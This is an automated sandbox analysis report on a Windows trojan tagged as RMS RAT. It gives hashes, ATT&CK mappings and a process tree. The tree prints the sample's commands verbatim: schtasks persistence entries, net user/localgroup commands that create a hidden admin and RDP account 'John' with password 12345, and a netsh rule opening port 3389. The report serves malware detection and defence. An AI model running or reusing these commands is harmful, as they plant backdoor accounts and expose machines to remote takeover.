rms | 4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50

Analysis

max time kernel
58s
max time network
199s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
02-01-2024 14:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
Size

6.2MB
MD5

c92c59fa1503d65d1d67a578928e3c55
SHA1

0cb1106bde45dd5be118bb7b9ebb2be3e41b7203
SHA256

4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50
SHA512

1f8c714bfc23bd642ec6f4e5539ac1585e0cd8a54ba2b72ff06d7b4f0dd94589a8e6ab41b689f11f51425067784e071eeffc7e803470d55793492d38f6d11241
SSDEEP

196608:CIgAn6JaxBEvXUJyXEJDNfZJoExr77dZWoNMUyr:SA6YxBYXY+sJokFZWdUy

Score

10^/10

rms evasion rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
1684	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Control Panel\International\Geo\Nation	winserv.exe

Executes dropped EXE 2 IoCs

pid	Process
2640	winserv.exe
2672	winserv.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2276	schtasks.exe
2556	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1084	timeout.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\winmgmts:\	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
2640	winserv.exe
2640	winserv.exe
2640	winserv.exe
2640	winserv.exe
2640	winserv.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2640	winserv.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2640	winserv.exe
2640	winserv.exe
2640	winserv.exe
2640	winserv.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1060 wrote to memory of 2276	1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe	30
PID 1060 wrote to memory of 2276	1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe	30
PID 1060 wrote to memory of 2276	1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe	30
PID 1060 wrote to memory of 2556	1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe	33
PID 1060 wrote to memory of 2556	1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe	33
PID 1060 wrote to memory of 2556	1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe	33
PID 1060 wrote to memory of 2640	1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe	36
PID 1060 wrote to memory of 2640	1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe	36
PID 1060 wrote to memory of 2640	1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe	36
PID 1060 wrote to memory of 2640	1060	4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe	36

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe
"C:\Users\Admin\AppData\Local\Temp\4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50.exe"
1⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1060
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:2276
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:2556
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2640
- - C:\ProgramData\Windows Tasks Service\winserv.exe
    "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
    3⤵
    - Executes dropped EXE
    PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
  2⤵
  PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
  2⤵
  PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
  2⤵
  PID:928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
  2⤵
  PID:292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
  2⤵
  PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
  2⤵
  PID:1652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net user John 12345 /add
  2⤵
  PID:1576
- C:\ProgramData\RDPWinst.exe
  C:\ProgramData\RDPWinst.exe -i
  2⤵
  PID:2768
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
    3⤵
    - Modifies Windows Firewall
    PID:1684
- C:\Windows\system32\cmd.exe
  cmd /c C:\Programdata\Install\del.bat
  2⤵
  PID:1904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" John /add
1⤵
PID:3036

C:\Windows\system32\net.exe
net localgroup "Администраторы" John /add
1⤵
PID:2404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
1⤵
PID:3028

C:\Windows\system32\net.exe
net localgroup "Пользователи удаленного управления" john /add" John /add
1⤵
PID:1484
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
  2⤵
  PID:884

C:\Windows\system32\net.exe
net localgroup "Administrators" John /add
1⤵
PID:1808
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 localgroup "Administrators" John /add
  2⤵
  PID:972

C:\Windows\system32\net.exe
net localgroup "Administradores" John /add
1⤵
PID:3048
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 localgroup "Administradores" John /add
  2⤵
  PID:1036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
1⤵
PID:1076

C:\Windows\system32\net.exe
net localgroup "Remote Desktop Users" john /add
1⤵
PID:824

C:\Windows\system32\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
1⤵
PID:2080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user John 12345 /add
1⤵
PID:2012

C:\Windows\system32\net.exe
net user John 12345 /add
1⤵
PID:2100

C:\Windows\system32\taskeng.exe
taskeng.exe {0F5315EB-9FAC-4E92-824A-3FD69ABCD6CC} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]
1⤵
PID:2044
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  PID:872
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  PID:860
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  PID:2836

C:\Windows\system32\timeout.exe
timeout 5
1⤵
- Delays execution with timeout.exe
PID:1084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
1.5MB

MD5
b955b1aac7afa755f85a82ac3baf3c73

SHA1
c8b2a8f77d52a423746dfc2fe901ce2f9361eb09

SHA256
42e400cfe4a453a8a959113cc6a7b45581dfac84e8e734219e787bc4ef63f082

SHA512
a4e4696f88651a16774080e23bffe3a71ee2752022f0417c1a8ed6979e8d96cadd77cadcd94c80f4f7a919e9b0c102a2b0513820862af8269ccdcefc27550c16

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
96KB

MD5
21c85cfbe0c2f9082736f7431148f923

SHA1
3d5ec73935552d9ac72ff3a45396293ca588c3a0

SHA256
de767b5ce02c50718a7b6dfd7aabcaaf1dfbc0c9e133e004857d4457b8f8fbf5

SHA512
524f4376ab35e1630a02f00361c1c6992e237bbf50ae7dc0a5481b3577d067180aef2c22f7f824ec349b178beb5ec1ced9790bd960ae5150f59818a7fd590914

Download Submit
memory/860-79-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/860-77-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/872-62-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/872-63-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/872-64-0x0000000000290000-0x0000000000291000-memory.dmp

Filesize
4KB

Download
memory/872-66-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2640-13-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2640-17-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2640-16-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2640-14-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2640-11-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2672-37-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/2672-29-0x0000000002AB0000-0x0000000002AB1000-memory.dmp

Filesize
4KB

Download
memory/2672-38-0x0000000005600000-0x0000000005601000-memory.dmp

Filesize
4KB

Download
memory/2672-40-0x0000000005B30000-0x0000000005B31000-memory.dmp

Filesize
4KB

Download
memory/2672-41-0x0000000005D00000-0x0000000005D01000-memory.dmp

Filesize
4KB

Download
memory/2672-39-0x0000000005A00000-0x0000000005A01000-memory.dmp

Filesize
4KB

Download
memory/2672-27-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2672-36-0x0000000004E70000-0x0000000004E71000-memory.dmp

Filesize
4KB

Download
memory/2672-35-0x0000000005110000-0x0000000005111000-memory.dmp

Filesize
4KB

Download
memory/2672-34-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/2672-33-0x0000000004E50000-0x0000000004E51000-memory.dmp

Filesize
4KB

Download
memory/2672-32-0x0000000004310000-0x0000000004311000-memory.dmp

Filesize
4KB

Download
memory/2672-30-0x0000000000F00000-0x0000000000F01000-memory.dmp

Filesize
4KB

Download
memory/2672-31-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

Filesize
4KB

Download
memory/2672-28-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

Filesize
4KB

Download
memory/2672-44-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2672-49-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2672-26-0x0000000000270000-0x0000000000271000-memory.dmp

Filesize
4KB

Download
memory/2672-25-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2672-23-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2672-65-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2672-22-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2672-19-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2672-20-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2768-74-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2836-138-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2836-137-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download